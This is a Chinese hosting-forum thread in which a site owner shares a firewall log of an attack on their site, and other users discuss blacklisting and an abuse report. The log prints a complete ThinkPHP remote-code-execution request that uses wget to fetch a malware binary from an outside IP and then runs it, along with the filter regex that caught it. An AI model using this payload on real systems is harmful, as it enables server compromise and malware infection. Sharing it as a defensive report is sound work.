全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1234|回复: 5

纪念下第一次被人攻击

[复制链接]
发表于 2019-2-4 07:15:43 | 显示全部楼层 |阅读模式
用户IP        195.231.2.25
类型        GET        过滤器        args
URI地址
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp/%20;wget%20http://168.235.82.199/MavDDzxY/maddy.x86%20;chmod%20777%20*%20maddy.x86;%20%20./maddy.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp
User-Agent
python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.9.1.el6.x86_64
过滤规则
(invokefunction|call_user_func_array|\\think\\)
传入值
function:call_user_func_array
风险值
call_user_func_array

这ip就在渗透,有点舍不得加黑名单,Google出来好像是阿鲁巴的
 楼主| 发表于 2019-2-4 14:33:10 | 显示全部楼层
xiaonv110 发表于 2019-2-4 07:26
机场???????

不是机场,自己的站
 楼主| 发表于 2019-2-4 14:35:23 | 显示全部楼层
168.235.82.199
这个病毒下载的ip是ramnode的,ramnode也不管吗》?已经abuse了,还是要自己动手D?
发表于 2019-2-4 14:40:47 | 显示全部楼层
新建的站都会容易被攻击吧
发表于 2019-2-4 15:26:39 来自手机 | 显示全部楼层
大惊小怪系列
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-27 07:21 , Processed in 0.095166 second(s), 10 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表